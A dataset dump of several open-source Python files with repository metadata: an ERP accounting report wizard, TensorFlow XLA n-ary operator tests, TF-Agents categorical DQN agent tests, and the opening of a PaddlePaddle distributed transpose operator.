f47ce709574d8f6f0b2c6c34e551d32cd278a480 | 4c3e992678341ccaa1d4d14e97dac2e0682026d1 | /addons/account/wizard/account_report_common.py | da1be81acd79cea6ed6fb59206f46c531281111e | [] | no_license | gahan-corporation/wyatt | 3a6add8f8f815bd26643e1e7c81aea024945130d | 77e56da362bec56f13bf0abc9f8cf13e98461111 | refs/heads/master | 2021-09-03T18:56:15.726392 | 2018-01-08T02:54:47 | 2018-01-08T02:54:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,850 | py | # -*- coding: utf-8 -*-
from gerp import api, fields, models, _
class AccountCommonReport(models.TransientModel):
_name = "account.common.report"
_description = "Account Common Report"
company_id = fields.Many2one('res.company', string='Company', readonly=True, default=lambda self: self.env.user.company_id)
journal_ids = fields.Many2many('account.journal', string='Journals', required=True, default=lambda self: self.env['account.journal'].search([]))
date_from = fields.Date(string='Start Date')
date_to = fields.Date(string='End Date')
target_move = fields.Selection([('posted', 'All Posted Entries'),
('all', 'All Entries'),
], string='Target Moves', required=True, default='posted')
def _build_contexts(self, data):
result = {}
result['journal_ids'] = 'journal_ids' in data['form'] and data['form']['journal_ids'] or False
result['state'] = 'target_move' in data['form'] and data['form']['target_move'] or ''
result['date_from'] = data['form']['date_from'] or False
result['date_to'] = data['form']['date_to'] or False
result['strict_range'] = True if result['date_from'] else False
return result
def _print_report(self, data):
raise NotImplementedError()
@api.multi
def check_report(self):
self.ensure_one()
data = {}
data['ids'] = self.env.context.get('active_ids', [])
data['model'] = self.env.context.get('active_model', 'ir.ui.menu')
data['form'] = self.read(['date_from', 'date_to', 'journal_ids', 'target_move'])[0]
used_context = self._build_contexts(data)
data['form']['used_context'] = dict(used_context, lang=self.env.context.get('lang') or 'en_US')
return self._print_report(data)
| [
"duchess@gahan-corporation.com"
] | duchess@gahan-corporation.com |
7102f2c70c62f905e9f89bfc6d22e4b136f0f913 | 41f52b15ab4c256ed5579f65520d1dee949613b8 | /tensorflow/compiler/tests/nary_ops_test.py | d16e38bb3cb0fa30b556c42e951fc6ce7363c8f3 | [
"Apache-2.0"
] | permissive | ychen404/TensorFlowPlus | c029ad2a77850cc6f141c13a4c10925e0a92d771 | d4fcbe7278b983b6f736acf2d948e1f7954ca7e6 | refs/heads/master | 2022-10-15T16:59:37.683864 | 2017-10-04T23:28:02 | 2017-10-04T23:28:02 | 210,258,338 | 1 | 0 | Apache-2.0 | 2022-10-04T23:54:20 | 2019-09-23T03:37:58 | C++ | UTF-8 | Python | false | false | 11,970 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test cases for operators with > 3 or arbitrary numbers of arguments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.compiler.tests.xla_test import XLATestCase
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import googletest
class NAryOpsTest(XLATestCase):
  """XLA tests for operators taking three-or-more / variadic arguments."""

  def _testNAry(self, op, args, expected, equality_fn=None):
    """Feed ``args`` through placeholders, run ``op``, compare to ``expected``.

    ``equality_fn`` defaults to assertAllClose with rtol=1e-3.
    """
    with self.test_session() as session:
      with self.test_scope():
        placeholders = [
            array_ops.placeholder(dtypes.as_dtype(arg.dtype), arg.shape)
            for arg in args
        ]
        feeds = {placeholders[i]: args[i] for i in range(0, len(args))}
        output = op(placeholders)
        result = session.run(output, feeds)
        if not equality_fn:
          equality_fn = self.assertAllClose
        equality_fn(result, expected, rtol=1e-3)
  def _nAryListCheck(self, results, expected, **kwargs):
    """Element-wise assertAllClose for list-valued results."""
    self.assertEqual(len(results), len(expected))
    for (r, e) in zip(results, expected):
      self.assertAllClose(r, e, **kwargs)
  def _testNAryLists(self, op, args, expected):
    """Like _testNAry but for ops returning a list of tensors."""
    self._testNAry(op, args, expected, equality_fn=self._nAryListCheck)
  def testFloat(self):
    """add_n over one, two and three float operands."""
    self._testNAry(math_ops.add_n,
                   [np.array([[1, 2, 3]], dtype=np.float32)],
                   expected=np.array([[1, 2, 3]], dtype=np.float32))
    self._testNAry(math_ops.add_n,
                   [np.array([1, 2], dtype=np.float32),
                    np.array([10, 20], dtype=np.float32)],
                   expected=np.array([11, 22], dtype=np.float32))
    self._testNAry(math_ops.add_n,
                   [np.array([-4], dtype=np.float32),
                    np.array([10], dtype=np.float32),
                    np.array([42], dtype=np.float32)],
                   expected=np.array([48], dtype=np.float32))
  def testIdentityN(self):
    """identity_n passes each input through unchanged (mixed dtypes too)."""
    self._testNAryLists(array_ops.identity_n,
                        [np.array([[1, 2, 3]], dtype=np.float32)],
                        expected=[np.array([[1, 2, 3]], dtype=np.float32)])
    self._testNAryLists(array_ops.identity_n,
                        [np.array([[1, 2], [3, 4]], dtype=np.float32),
                         np.array([[3, 2, 1], [6, 5, 1]], dtype=np.float32)],
                        expected=[
                            np.array([[1, 2], [3, 4]], dtype=np.float32),
                            np.array([[3, 2, 1], [6, 5, 1]], dtype=np.float32)])
    self._testNAryLists(array_ops.identity_n,
                        [np.array([[1], [2], [3], [4]], dtype=np.int32),
                         np.array([[3, 2, 1], [6, 5, 1]], dtype=np.float32)],
                        expected=[
                            np.array([[1], [2], [3], [4]], dtype=np.int32),
                            np.array([[3, 2, 1], [6, 5, 1]], dtype=np.float32)])
  def testConcat(self):
    """concat along axis 0 and axis 1."""
    self._testNAry(
        lambda x: array_ops.concat(x, 0), [
            np.array(
                [[1, 2, 3], [4, 5, 6]], dtype=np.float32), np.array(
                    [[7, 8, 9], [10, 11, 12]], dtype=np.float32)
        ],
        expected=np.array(
            [[1, 2, 3], [4, 5, 6], [7, 8, 9], [10, 11, 12]], dtype=np.float32))
    self._testNAry(
        lambda x: array_ops.concat(x, 1), [
            np.array(
                [[1, 2, 3], [4, 5, 6]], dtype=np.float32), np.array(
                    [[7, 8, 9], [10, 11, 12]], dtype=np.float32)
        ],
        expected=np.array(
            [[1, 2, 3, 7, 8, 9], [4, 5, 6, 10, 11, 12]], dtype=np.float32))
  def testOneHot(self):
    """one_hot with custom on/off values, default axis and axis=1."""
    with self.test_session() as session, self.test_scope():
      indices = array_ops.constant(np.array([[2, 3], [0, 1]], dtype=np.int32))
      op = array_ops.one_hot(indices,
                             np.int32(4),
                             on_value=np.float32(7), off_value=np.float32(3))
      output = session.run(op)
      expected = np.array([[[3, 3, 7, 3], [3, 3, 3, 7]],
                           [[7, 3, 3, 3], [3, 7, 3, 3]]],
                          dtype=np.float32)
      self.assertAllEqual(output, expected)
      op = array_ops.one_hot(indices,
                             np.int32(4),
                             on_value=np.int32(2), off_value=np.int32(1),
                             axis=1)
      output = session.run(op)
      expected = np.array([[[1, 1], [1, 1], [2, 1], [1, 2]],
                           [[2, 1], [1, 2], [1, 1], [1, 1]]],
                          dtype=np.int32)
      self.assertAllEqual(output, expected)
  def testSplitV(self):
    """split with explicit per-piece sizes along axis 1."""
    with self.test_session() as session:
      with self.test_scope():
        output = session.run(
            array_ops.split(np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 0, 1, 2]],
                                     dtype=np.float32),
                            [2, 2], 1))
        expected = [np.array([[1, 2], [5, 6], [9, 0]], dtype=np.float32),
                    np.array([[3, 4], [7, 8], [1, 2]], dtype=np.float32)]
        self.assertAllEqual(output, expected)
  def testStridedSlice(self):
    """strided_slice on empty/nonempty inputs, negative strides, newaxis."""
    self._testNAry(lambda x: array_ops.strided_slice(*x),
                   [np.array([[], [], []], dtype=np.float32),
                    np.array([1, 0], dtype=np.int32),
                    np.array([3, 0], dtype=np.int32),
                    np.array([1, 1], dtype=np.int32)],
                   expected=np.array([[], []], dtype=np.float32))
    if np.int64 in self.int_types:
      self._testNAry(
          lambda x: array_ops.strided_slice(*x), [
              np.array([[], [], []], dtype=np.float32), np.array(
                  [1, 0], dtype=np.int64), np.array([3, 0], dtype=np.int64),
              np.array([1, 1], dtype=np.int64)
          ],
          expected=np.array([[], []], dtype=np.float32))
    self._testNAry(lambda x: array_ops.strided_slice(*x),
                   [np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
                             dtype=np.float32),
                    np.array([1, 1], dtype=np.int32),
                    np.array([3, 3], dtype=np.int32),
                    np.array([1, 1], dtype=np.int32)],
                   expected=np.array([[5, 6], [8, 9]], dtype=np.float32))
    self._testNAry(lambda x: array_ops.strided_slice(*x),
                   [np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
                             dtype=np.float32),
                    np.array([0, 2], dtype=np.int32),
                    np.array([2, 0], dtype=np.int32),
                    np.array([1, -1], dtype=np.int32)],
                   expected=np.array([[3, 2], [6, 5]], dtype=np.float32))
    self._testNAry(lambda x: x[0][0:2, array_ops.newaxis, ::-1],
                   [np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
                             dtype=np.float32)],
                   expected=np.array([[[3, 2, 1]], [[6, 5, 4]]],
                                     dtype=np.float32))
    self._testNAry(lambda x: x[0][1, :, array_ops.newaxis],
                   [np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
                             dtype=np.float32)],
                   expected=np.array([[4], [5], [6]], dtype=np.float32))
  def testStridedSliceGrad(self):
    """strided_slice_grad scatters gradients back into the input shape."""
    # Tests cases where input shape is empty.
    self._testNAry(lambda x: array_ops.strided_slice_grad(*x),
                   [np.array([], dtype=np.int32),
                    np.array([], dtype=np.int32),
                    np.array([], dtype=np.int32),
                    np.array([], dtype=np.int32),
                    np.float32(0.5)],
                   expected=np.array(np.float32(0.5), dtype=np.float32))
    # Tests case where input shape is non-empty, but gradients are empty.
    self._testNAry(lambda x: array_ops.strided_slice_grad(*x),
                   [np.array([3], dtype=np.int32),
                    np.array([0], dtype=np.int32),
                    np.array([0], dtype=np.int32),
                    np.array([1], dtype=np.int32),
                    np.array([], dtype=np.float32)],
                   expected=np.array([0, 0, 0], dtype=np.float32))
    self._testNAry(lambda x: array_ops.strided_slice_grad(*x),
                   [np.array([3, 0], dtype=np.int32),
                    np.array([1, 0], dtype=np.int32),
                    np.array([3, 0], dtype=np.int32),
                    np.array([1, 1], dtype=np.int32),
                    np.array([[], []], dtype=np.float32)],
                   expected=np.array([[], [], []], dtype=np.float32))
    self._testNAry(lambda x: array_ops.strided_slice_grad(*x),
                   [np.array([3, 3], dtype=np.int32),
                    np.array([1, 1], dtype=np.int32),
                    np.array([3, 3], dtype=np.int32),
                    np.array([1, 1], dtype=np.int32),
                    np.array([[5, 6], [8, 9]], dtype=np.float32)],
                   expected=np.array([[0, 0, 0], [0, 5, 6], [0, 8, 9]],
                                     dtype=np.float32))
    def ssg_test(x):
      # shrink_axis_mask / new_axis_mask variants.
      return array_ops.strided_slice_grad(*x, shrink_axis_mask=0x4,
                                          new_axis_mask=0x1)
    self._testNAry(ssg_test,
                   [np.array([3, 1, 3], dtype=np.int32),
                    np.array([0, 0, 0, 2], dtype=np.int32),
                    np.array([0, 3, 1, -4], dtype=np.int32),
                    np.array([1, 2, 1, -3], dtype=np.int32),
                    np.array([[[1], [2]]], dtype=np.float32)],
                   expected=np.array([[[0, 0, 1]], [[0, 0, 0]], [[0, 0, 2]]],
                                     dtype=np.float32))
    ssg_test2 = lambda x: array_ops.strided_slice_grad(*x, new_axis_mask=0x15)
    self._testNAry(ssg_test2,
                   [np.array([4, 4], dtype=np.int32),
                    np.array([0, 0, 0, 1, 0], dtype=np.int32),
                    np.array([0, 3, 0, 4, 0], dtype=np.int32),
                    np.array([1, 2, 1, 2, 1], dtype=np.int32),
                    np.array([[[[[1], [2]]], [[[3], [4]]]]], dtype=np.float32)],
                   expected=np.array([[0, 1, 0, 2], [0, 0, 0, 0], [0, 3, 0, 4],
                                      [0, 0, 0, 0]], dtype=np.float32))
    self._testNAry(lambda x: array_ops.strided_slice_grad(*x),
                   [np.array([3, 3], dtype=np.int32),
                    np.array([0, 2], dtype=np.int32),
                    np.array([2, 0], dtype=np.int32),
                    np.array([1, -1], dtype=np.int32),
                    np.array([[1, 2], [3, 4]], dtype=np.float32)],
                   expected=np.array([[0, 2, 1], [0, 4, 3], [0, 0, 0]],
                                     dtype=np.float32))
    self._testNAry(lambda x: array_ops.strided_slice_grad(*x),
                   [np.array([3, 3], dtype=np.int32),
                    np.array([2, 2], dtype=np.int32),
                    np.array([0, 1], dtype=np.int32),
                    np.array([-1, -2], dtype=np.int32),
                    np.array([[1], [2]], dtype=np.float32)],
                   expected=np.array([[0, 0, 0], [0, 0, 2], [0, 0, 1]],
                                     dtype=np.float32))
# Allow running this test module directly.
if __name__ == "__main__":
    googletest.main()
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
fcc225958a570be16bc7a19b38cb01a20de850da | 457959604ab1571c23d3c136ceb4def5dec685d5 | /tf_agents/agents/categorical_dqn/categorical_dqn_agent_test.py | 2380f5ac930402b7e81a3dc12cf34321bddb0106 | [
"Apache-2.0"
] | permissive | Squadrick/agents | de3aa6566cf237e82fdaf1569586365d7803302e | d7905cfc8b317900657113c34f51244ec5211b69 | refs/heads/master | 2020-06-07T07:47:05.797364 | 2019-06-19T20:53:58 | 2019-06-19T20:54:32 | 192,964,888 | 0 | 0 | Apache-2.0 | 2019-06-20T17:55:38 | 2019-06-20T17:55:38 | null | UTF-8 | Python | false | false | 15,208 | py | # coding=utf-8
# Copyright 2018 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for agents.dqn.categorical_dqn_agent."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tf_agents.agents.categorical_dqn import categorical_dqn_agent
from tf_agents.networks import categorical_q_network
from tf_agents.networks import network
from tf_agents.networks import q_rnn_network
from tf_agents.specs import tensor_spec
from tf_agents.trajectories import policy_step
from tf_agents.trajectories import test_utils
from tf_agents.trajectories import time_step as ts
from tf_agents.trajectories import trajectory
from tf_agents.utils import common
class DummyCategoricalNet(network.Network):
    """Deterministic categorical Q-network used as a test fixture.

    All weights are constant-initialized, so the produced logits (and any
    loss computed from them) are reproducible across runs.
    """

    def __init__(self,
                 input_tensor_spec,
                 num_atoms=51,
                 num_actions=2,
                 name=None):
        self._num_atoms = num_atoms
        self._num_actions = num_actions
        super(DummyCategoricalNet, self).__init__(
            input_tensor_spec=input_tensor_spec,
            state_spec=(),
            name=name)
        # In CategoricalDQN we are dealing with a distribution over Q-values,
        # represented as num_atoms bins ranging from min_q_value to
        # max_q_value. To replicate the setup of the non-categorical network
        # (namely, [[2, 1], [1, 1]]), the logits of the first action put more
        # weight on the higher q-value bins than on the lower ones, giving
        # the first action the higher value.
        action_zero_row = np.concatenate(
            (np.arange(num_atoms), np.ones(num_atoms)))
        action_one_row = np.concatenate(
            (np.ones(num_atoms), np.ones(num_atoms)))
        constant_weights = np.array([action_zero_row, action_one_row])
        kernel_initializer = tf.compat.v1.initializers.constant(
            constant_weights, verify_shape=True)
        bias_initializer = tf.compat.v1.initializers.ones()
        # Keep custom layers in an attribute so they can be serialized
        # through the Checkpointable API.
        self._dummy_layers = [
            tf.keras.layers.Dense(
                num_actions * num_atoms,
                kernel_initializer=kernel_initializer,
                bias_initializer=bias_initializer)
        ]

    @property
    def num_atoms(self):
        """Number of atoms (bins) in the value distribution."""
        return self._num_atoms

    def call(self, inputs, unused_step_type=None, network_state=()):
        """Maps inputs to logits of shape (batch, num_actions, num_atoms)."""
        outputs = tf.cast(inputs, tf.float32)
        for dense in self._dummy_layers:
            outputs = dense(outputs)
        logits = tf.reshape(outputs, [-1, self._num_actions, self._num_atoms])
        return logits, network_state
class DummyCategoricalQRnnNetwork(q_rnn_network.QRnnNetwork):
    """Wraps QRnnNetwork so its flat output is reshaped into categorical logits.

    The underlying RNN is built with num_actions * num_atoms outputs; `call`
    reshapes that last dimension into (num_actions, num_atoms).
    """

    def __init__(self,
                 input_tensor_spec,
                 action_spec,
                 num_atoms=51,
                 **kwargs):
        if not isinstance(action_spec, tensor_spec.BoundedTensorSpec):
            raise TypeError('action_spec must be a BoundedTensorSpec. Got: %s' % (
                action_spec,))
        self._num_actions = action_spec.maximum - action_spec.minimum + 1
        self._num_atoms = num_atoms
        # Build the parent network with num_actions * num_atoms output units by
        # handing it a widened action spec.
        q_network_action_spec = tensor_spec.BoundedTensorSpec(
            (), tf.int32, minimum=0, maximum=self._num_actions * num_atoms - 1)
        super(DummyCategoricalQRnnNetwork, self).__init__(
            input_tensor_spec=input_tensor_spec,
            action_spec=q_network_action_spec,
            **kwargs)

    @property
    def num_atoms(self):
        """Number of atoms (bins) in the value distribution."""
        return self._num_atoms

    def call(self, observations, step_type=None, network_state=None):
        """Returns logits reshaped to (..., num_actions, num_atoms)."""
        logits, network_state = super(DummyCategoricalQRnnNetwork, self).call(
            observations, step_type, network_state)
        shape = logits.shape.as_list()
        assert shape[-1] == self._num_actions * self._num_atoms
        new_shape = shape[:-1] + [self._num_actions, self._num_atoms]
        logits = tf.reshape(logits, new_shape)
        return logits, network_state
class CategoricalDqnAgentTest(tf.test.TestCase):
    """Unit tests for CategoricalDqnAgent (construction, loss, policy, train)."""

    def setUp(self):
        """Builds the specs, networks and optimizer shared by all tests."""
        super(CategoricalDqnAgentTest, self).setUp()
        tf.enable_resource_variables()
        self._obs_spec = tensor_spec.TensorSpec([2], tf.float32)
        self._time_step_spec = ts.time_step_spec(self._obs_spec)
        self._action_spec = tensor_spec.BoundedTensorSpec((), tf.int32, 0, 1)
        self._categorical_net = categorical_q_network.CategoricalQNetwork(
            self._obs_spec,
            self._action_spec,
            fc_layer_params=[4])
        self._dummy_categorical_net = DummyCategoricalNet(self._obs_spec)
        self._optimizer = tf.train.GradientDescentOptimizer(0.01)

    def testCreateAgentNestSizeChecks(self):
        """A nest of more than one action spec must be rejected."""
        action_spec = [
            tensor_spec.BoundedTensorSpec([1], tf.int32, 0, 1),
            tensor_spec.BoundedTensorSpec([1], tf.int32, 0, 1)
        ]
        with self.assertRaisesRegexp(
            ValueError, '.*Only one dimensional actions.*'):
          categorical_dqn_agent.CategoricalDqnAgent(
              self._time_step_spec,
              action_spec,
              self._dummy_categorical_net,
              self._optimizer)

    def testCreateAgentDimChecks(self):
        """A multi-dimensional action spec must be rejected."""
        action_spec = [tensor_spec.BoundedTensorSpec([1, 2], tf.int32, 0, 1)]
        with self.assertRaisesRegexp(
            ValueError, '.*Only one dimensional actions.*'):
          categorical_dqn_agent.CategoricalDqnAgent(
              self._time_step_spec,
              action_spec,
              self._dummy_categorical_net,
              self._optimizer)

    def testCreateAgentDefaultNetwork(self):
        """Construction with the standard CategoricalQNetwork succeeds."""
        categorical_dqn_agent.CategoricalDqnAgent(
            self._time_step_spec,
            self._action_spec,
            self._categorical_net,
            self._optimizer)

    def testCriticLoss(self):
        """Loss with the constant dummy network matches the known value."""
        agent = categorical_dqn_agent.CategoricalDqnAgent(
            self._time_step_spec,
            self._action_spec,
            self._dummy_categorical_net,
            self._optimizer)
        observations = tf.constant([[1, 2], [3, 4]], dtype=tf.float32)
        time_steps = ts.restart(observations, batch_size=2)
        actions = tf.constant([0, 1], dtype=tf.int32)
        action_steps = policy_step.PolicyStep(actions)
        rewards = tf.constant([10, 20], dtype=tf.float32)
        discounts = tf.constant([0.9, 0.9], dtype=tf.float32)
        next_observations = tf.constant([[5, 6], [7, 8]], dtype=tf.float32)
        next_time_steps = ts.transition(next_observations, rewards, discounts)
        experience = test_utils.stacked_trajectory_from_transition(
            time_steps, action_steps, next_time_steps)
        # Due to the constant initialization of the DummyCategoricalNet, we can
        # expect the same loss every time.
        expected_loss = 2.195
        loss_info = agent._loss(experience)
        self.evaluate(tf.global_variables_initializer())
        evaluated_loss = self.evaluate(loss_info).loss
        self.assertAllClose(evaluated_loss, expected_loss, atol=1e-3)

    def testCriticLossNStep(self):
        """n_step_update=2 produces the expected discounted rewards and loss."""
        agent = categorical_dqn_agent.CategoricalDqnAgent(
            self._time_step_spec,
            self._action_spec,
            self._dummy_categorical_net,
            self._optimizer,
            n_step_update=2)
        observations = tf.constant([[1, 2], [3, 4]], dtype=tf.float32)
        time_steps = ts.restart(observations, batch_size=2)
        actions = tf.constant([0, 1], dtype=tf.int32)
        action_steps = policy_step.PolicyStep(actions)
        rewards = tf.constant([10, 20], dtype=tf.float32)
        discounts = tf.constant([0.9, 0.9], dtype=tf.float32)
        next_observations = tf.constant([[5, 6], [7, 8]], dtype=tf.float32)
        next_time_steps = ts.transition(next_observations, rewards, discounts)
        third_observations = tf.constant([[9, 10], [11, 12]], dtype=tf.float32)
        third_time_steps = ts.transition(third_observations, rewards, discounts)
        experience1 = trajectory.from_transition(
            time_steps, action_steps, next_time_steps)
        experience2 = trajectory.from_transition(
            next_time_steps, action_steps, third_time_steps)
        experience3 = trajectory.from_transition(
            third_time_steps, action_steps, third_time_steps)
        # Stack three consecutive transitions along the time axis.
        experience = tf.nest.map_structure(
            lambda x, y, z: tf.stack([x, y, z], axis=1),
            experience1, experience2, experience3)
        loss_info = agent._loss(experience)
        # discounted_rewards should evaluate to 10 + 0.9 * 10 = 19 and
        # 20 + 0.9 * 20 = 38.
        evaluated_discounted_rewards = self.evaluate(agent._discounted_rewards)
        self.assertAllClose(evaluated_discounted_rewards, [[19], [38]], atol=1e-3)
        # Both final_value_discount values should be 0.9 * 0.9 = 0.81.
        evaluated_final_value_discount = self.evaluate(agent._final_value_discount)
        self.assertAllClose(evaluated_final_value_discount, [[0.81], [0.81]],
                            atol=1e-3)
        # Due to the constant initialization of the DummyCategoricalNet, we can
        # expect the same loss every time.
        expected_loss = 2.195
        self.evaluate(tf.global_variables_initializer())
        evaluated_loss = self.evaluate(loss_info).loss
        self.assertAllClose(evaluated_loss, expected_loss, atol=1e-3)

    def testPolicy(self):
        """Policy actions have the right shape and respect the action bounds."""
        agent = categorical_dqn_agent.CategoricalDqnAgent(
            self._time_step_spec,
            self._action_spec,
            self._categorical_net,
            self._optimizer)
        observations = tf.constant([[1, 2], [3, 4]], dtype=tf.float32)
        time_steps = ts.restart(observations, batch_size=2)
        actions, _, _ = agent.policy.action(time_steps)
        self.assertEqual(actions.shape, [2])
        self.evaluate(tf.global_variables_initializer())
        actions_ = self.evaluate(actions)
        self.assertTrue(all(actions_ <= self._action_spec.maximum))
        self.assertTrue(all(actions_ >= self._action_spec.minimum))

    def testInitialize(self):
        """initialize() copies the online network weights into the target."""
        agent = categorical_dqn_agent.CategoricalDqnAgent(
            self._time_step_spec,
            self._action_spec,
            self._categorical_net,
            self._optimizer)
        observations = tf.constant([[1, 2], [3, 4]], dtype=tf.float32)
        time_steps = ts.restart(observations, batch_size=2)
        actions = tf.constant([0, 1], dtype=tf.int32)
        action_steps = policy_step.PolicyStep(actions)
        rewards = tf.constant([10, 20], dtype=tf.float32)
        discounts = tf.constant([0.9, 0.9], dtype=tf.float32)
        next_time_steps = ts.transition(observations, rewards, discounts)
        experience = test_utils.stacked_trajectory_from_transition(
            time_steps, action_steps, next_time_steps)
        loss_info = agent._loss(experience)
        initialize = agent.initialize()
        self.evaluate(tf.global_variables_initializer())
        losses = self.evaluate(loss_info).loss
        self.assertGreater(losses, 0.0)
        critic_variables = agent._q_network.variables
        target_critic_variables = agent._target_q_network.variables
        self.assertTrue(critic_variables)
        self.assertTrue(target_critic_variables)
        self.evaluate(initialize)
        # After initialize, online and target variables must match pairwise.
        for s, t in zip(critic_variables, target_critic_variables):
            self.assertAllClose(self.evaluate(s), self.evaluate(t))

    def testUpdateTarget(self):
        """_update_target() runs without error after computing a loss."""
        agent = categorical_dqn_agent.CategoricalDqnAgent(
            self._time_step_spec,
            self._action_spec,
            self._categorical_net,
            self._optimizer)
        observations = tf.constant([[1, 2], [3, 4]], dtype=tf.float32)
        time_steps = ts.restart(observations, batch_size=2)
        actions = tf.constant([0, 1], dtype=tf.int32)
        action_steps = policy_step.PolicyStep(actions)
        experience = test_utils.stacked_trajectory_from_transition(
            time_steps, action_steps, time_steps)
        loss_info = agent._loss(experience)
        update_targets = agent._update_target()
        self.evaluate(tf.global_variables_initializer())
        losses = self.evaluate(loss_info).loss
        self.assertGreater(losses, 0.0)
        self.evaluate(update_targets)

    def testTrain(self):
        """One train step with the dummy network reproduces the known loss."""
        agent = categorical_dqn_agent.CategoricalDqnAgent(
            self._time_step_spec,
            self._action_spec,
            self._dummy_categorical_net,
            self._optimizer)
        observations = tf.constant([[1, 2], [3, 4]], dtype=tf.float32)
        time_steps = ts.restart(observations, batch_size=2)
        actions = tf.constant([0, 1], dtype=tf.int32)
        action_steps = policy_step.PolicyStep(actions)
        rewards = tf.constant([10, 20], dtype=tf.float32)
        discounts = tf.constant([0.9, 0.9], dtype=tf.float32)
        next_observations = tf.constant([[5, 6], [7, 8]], dtype=tf.float32)
        next_time_steps = ts.transition(next_observations, rewards, discounts)
        experience = test_utils.stacked_trajectory_from_transition(
            time_steps, action_steps, next_time_steps)
        train_step = agent.train(experience, weights=None)
        # Due to the constant initialization of the DummyCategoricalNet, we can
        # expect the same loss every time.
        expected_loss = 2.195
        self.evaluate(tf.global_variables_initializer())
        evaluated_loss, _ = self.evaluate(train_step)
        self.assertAllClose(evaluated_loss, expected_loss, atol=1e-3)

    def testTrainWithRnn(self):
        """Training with an RNN-based categorical network runs end to end."""
        action_spec = tensor_spec.BoundedTensorSpec([1], tf.int32, 0, 1)
        batch_size = 5
        observations = tf.constant(
            [[[1, 2], [3, 4], [5, 6]]] * batch_size, dtype=tf.float32)
        actions = tf.constant([[[0], [1], [1]]] * batch_size, dtype=tf.int32)
        time_steps = ts.TimeStep(
            step_type=tf.constant([[1] * 3] * batch_size, dtype=tf.int32),
            reward=tf.constant([[1] * 3] * batch_size, dtype=tf.float32),
            discount=tf.constant([[1] * 3] * batch_size, dtype=tf.float32),
            observation=[observations])
        experience = trajectory.Trajectory(
            step_type=time_steps.step_type,
            observation=observations,
            action=actions,
            policy_info=(),
            next_step_type=time_steps.step_type,
            reward=time_steps.reward,
            discount=time_steps.discount)
        categorical_q_rnn_network = DummyCategoricalQRnnNetwork(
            self._obs_spec,
            action_spec,
            conv_layer_params=None,
            input_fc_layer_params=(16,),
            preprocessing_combiner=None,
            lstm_size=(40,),
            output_fc_layer_params=(16,),
        )
        counter = common.create_variable('test_train_counter')
        # NOTE(review): `counter` is never passed to the agent (no
        # train_step_counter argument), so the assertEqual(..., 0) below can
        # only ever see 0 — presumably an oversight; confirm upstream.
        agent = categorical_dqn_agent.CategoricalDqnAgent(
            self._time_step_spec,
            action_spec,
            categorical_q_rnn_network,
            optimizer=tf.train.AdamOptimizer(0.001),
        )
        # Force variable creation.
        agent.policy.variables()
        if tf.executing_eagerly():
          loss = lambda: agent.train(experience)
        else:
          loss = agent.train(experience)
        self.evaluate(tf.compat.v1.initialize_all_variables())
        self.assertEqual(self.evaluate(counter), 0)
        self.evaluate(loss)
# Allow running this test module directly.
if __name__ == '__main__':
    tf.test.main()
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
081a6467862d8313dc76b52f240463d6543170aa | e1092274408656117bc00252bc761e3609ec437f | /python/paddle/distributed/auto_parallel/operators/dist_transpose.py | 8b40524e47315260d17e38f12bb95b5d93df39fb | [
"Apache-2.0"
] | permissive | xiegegege/Paddle | 92822623e4d7fe0263503f11b63fb22610bf2773 | df1d04ca0031da2d701f314f1c98afdbb107b1b5 | refs/heads/develop | 2022-01-13T08:34:09.835700 | 2021-12-30T07:06:03 | 2021-12-30T07:06:03 | 226,800,733 | 0 | 0 | Apache-2.0 | 2019-12-09T06:28:40 | 2019-12-09T06:28:39 | null | UTF-8 | Python | false | false | 4,337 | py | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
from .common import DistributedOperatorImplContainer
from .common import DistributedOperatorImpl
from .common import register_distributed_operator_impl_container
from .common import register_distributed_operator_impl
from ..utils import is_dim_shard
from ..utils import is_dim_replicate
from ..utils import is_valid_list_index
from ..utils import compute_compatible_dim_mapping
from ..utils import compute_compatible_dims_mapping
from ..utils import compute_compatible_and_update_dim_mapping
class DistributedTranspose2(DistributedOperatorImplContainer):
    """Container holding the distributed implementations of transpose2."""

    def __init__(self, name):
        super(DistributedTranspose2, self).__init__()
        self._name = name
# Register the container so the auto-parallel planner can resolve transpose2.
register_distributed_operator_impl_container(
    "transpose2", DistributedTranspose2("transpose2"))
class DistributedTranspose2Impl(DistributedOperatorImpl):
    """Distributed implementation of transpose2: permutes dims mappings by `axis`."""

    def __init__(self, name):
        super(DistributedTranspose2Impl, self).__init__()
        self._name = name
        self._forward_implemented = False
        self._backward_implemented = False

    def is_input_compatible(self, dist_op):
        # Any input sharding is acceptable for transpose2.
        return True

